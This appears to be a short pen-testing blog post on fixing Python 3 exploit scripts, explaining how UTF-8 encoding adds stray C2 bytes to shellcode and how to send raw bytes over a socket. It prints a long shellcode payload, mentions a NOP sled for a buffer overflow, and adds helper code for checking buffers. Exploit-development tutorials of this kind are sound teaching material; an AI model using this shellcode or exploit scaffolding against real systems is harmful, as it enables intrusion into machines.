December 5, 2019 · Basic Pen-Testing Fuzzing

Fix Python3 exploit development extra C2 issue

1. Remove extra C2 character

Let's say we have a payload like this:

    payload = "\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" + \
              "\x52\x83\xc6\x04\x31\x56\x0e\x03\xab\x6b\xc2\xf7\xaf\x9c\x80" + \
              "\xf8\x4f\x5d\xe5\x71\xaa\x6c\x25\xe5\xbf\xdf\x95\x6d\xed\xd3"

In Python 2 we can send it directly to the server without any encoding, since a plain string literal is already a byte string.

But in Python 3 things changed.
We need to use the b prefix to mark the literal as a byte string, like this:

    payload = b"\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" + \
              b"\x52\x83\xc6\x04\x31\x56\x0e\x03\xab\x6b\xc2\xf7\xaf\x9c\x80" + \
              b"\xf8\x4f\x5d\xe5\x71\xaa\x6c\x25\xe5\xbf\xdf\x95\x6d\xed\xd3" + \
              b"\x5e\x23\x05\x67\x12\xec\x2a\xc0\x99\xca\x05\xd1\xb2\x2f\x04" + \
              b"\x51\xc9\x63\xe6\x68\x02\x76\xe7\xad\x7f\x7b\xb5\x66\x0b\x2e" + \
              b"\x29\x02\x41\xf3\xc2\x58\x47\x73\x37\x28\x66\x52\xe6\x22\x31" + \
              b"\x74\x09\xe6\x49\x3d\x11\xeb\x74\xf7\xaa\xdf\x03\x06\x7a\x2e" + \
              b"\xeb\xa5\x43\x9e\x1e\xb7\x84\x19\xc1\xc2\xfc\x59\x7c\xd5\x3b" + \
              b"\x23\x5a\x50\xdf\x83\x29\xc2\x3b\x35\xfd\x95\xc8\x39\x4a\xd1" + \
              b"\x96\x5d\x4d\x36\xad\x5a\xc6\xb9\x61\xeb\x9c\x9d\xa5\xb7\x47" + \
              b"\xbf\xfc\x1d\x29\xc0\x1e\xfe\x96\x64\x55\x13\xc2\x14\x34\x7c" + \
              b"\x27\x15\xc6\x7c\x2f\x2e\xb5\x4e\xf0\x84\x51\xe3\x79\x03\xa6" + \
              b"\x04\x50\xf3\x38\xfb\x5b\x04\x11\x38\x0f\x54\x09\xe9\x30\x3f" + \
              b"\xc9\x16\xe5\x90\x99\xb8\x56\x51\x49\x79\x07\x39\x83\x76\x78" + \
              b"\x59\xac\x5c\x11\xf0\x57\x37\x14\x0e\x57\x73\x40\x12\x57\x6a" + \
              b"\xcd\x9b\xb1\xe6\xfd\xcd\x6a\x9f\x64\x54\xe0\x3e\x68\x42\x8d" + \
              b"\x01\xe2\x61\x72\xcf\x03\x0f\x60\xb8\xe3\x5a\xda\x6f\xfb\x70" + \
              b"\x72\xf3\x6e\x1f\x82\x7a\x93\x88\xd5\x2b\x65\xc1\xb3\xc1\xdc" + \
              b"\x7b\xa1\x1b\xb8\x44\x61\xc0\x79\x4a\x68\x85\xc6\x68\x7a\x53" + \
              b"\xc6\x34\x2e\x0b\x91\xe2\x98\xed\x4b\x45\x72\xa4\x20\x0f\x12" + \
              b"\x31\x0b\x90\x64\x3e\x46\x66\x88\x8f\x3f\x3f\xb7\x20\xa8\xb7" + \
              b"\xc0\x5c\x48\x37\x1b\xe5\x78\x72\x01\x4c\x11\xdb\xd0\xcc\x7c" + \
              b"\xdc\x0f\x12\x79\x5f\xa5\xeb\x7e\x7f\xcc\xee\x3b\xc7\x3d\x83" + \
              b"\x54\xa2\x41\x30\x54\xe7" + b"B" * 100

Otherwise the string gets UTF-8 encoded on its way out, and every character from \x80 upwards becomes two bytes (for example \x80 becomes \xc2\x80), so extra C2 bytes appear after \x80 and the payload no longer matches the intended shellcode.
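To make the C2 issue concrete, here is an added example (not code from the original post) that encodes the first 15 bytes of the payload above both ways, reports where the UTF-8 lead bytes land, and gives a small check to run on a buffer before it reaches socket.send(); the sample values and helper names are my own.

```python
# Added example, not from the original post: shows where the extra C2
# bytes come from when a Python 3 str payload is UTF-8 encoded, and how
# to check a buffer before it is handed to socket.send().

# Constructed sample: the first 15 bytes of the payload above, written
# once as a str (Python 2 style) and once as a bytes literal (Python 3).
PAYLOAD_STR = "\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
PAYLOAD_BYTES = b"\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"


def utf8_inflation(payload: str) -> tuple:
    """(intended length, length after str.encode()).

    str.encode() defaults to UTF-8; each character from \\x80 upward is
    written as a two-byte sequence (\\xc2 or \\xc3 plus the original
    byte), so the buffer grows by one byte per such character.
    """
    return len(payload), len(payload.encode())


def lead_byte_offsets(buf: bytes) -> list:
    """Offsets of UTF-8 lead bytes that raw shellcode would not contain.

    Returns [] when buf does not decode as UTF-8 at all, the usual case for
    real shellcode (a raw \\xba at offset 0 is an invalid start byte). A
    buffer that happens to be valid UTF-8 is still reported, so treat a
    non-empty result as a prompt to inspect, not as proof of corruption.
    """
    try:
        text = buf.decode("utf-8")
    except UnicodeDecodeError:
        return []
    offsets, pos = [], 0
    for ch in text:
        width = len(ch.encode("utf-8"))
        if width > 1:
            offsets.append(pos)
        pos += width
    return offsets


def as_wire_bytes(payload) -> bytes:
    """Bytes safe for socket.send(): bytes pass through unchanged; a str
    written with \\xNN escapes is encoded one byte per character (latin-1)
    instead of the UTF-8 default that inserts the C2/C3 lead bytes."""
    if isinstance(payload, (bytes, bytearray)):
        return bytes(payload)
    if any(ord(c) > 0xFF for c in payload):
        raise ValueError("str has code points above 0xFF; not raw shellcode")
    return payload.encode("latin-1")


if __name__ == "__main__":
    print(utf8_inflation(PAYLOAD_STR))                  # (15, 23)
    print(lead_byte_offsets(PAYLOAD_STR.encode()))      # [0, 2, 7, 9, 11, 15, 19, 21]
    print(as_wire_bytes(PAYLOAD_STR) == PAYLOAD_BYTES)  # True
```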

2. Include b"\x90" * 8 for buffer overflow exploit

We have to add a few extra \x90 bytes after the jmp address; \x90 is the NOP (no operation) instruction.
See more about what \x90 is here:

https://en.wikipedia.org/wiki/NOP_(code)

3. In socket programming, you can send a byte string directly, but not a str: a str needs to be encoded first.

    import socket

    my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    my_socket.connect((host, port))  # host and port are assumed to be set earlier in the script

    my_socket.send("USER a\n\r".encode())  # a str must be encoded into a byte string first
    print("receive " + my_socket.recv(2048).decode())

    message = b"A"

    print(message)  # a byte string is accepted as-is, no need to encode
    my_socket.send(message)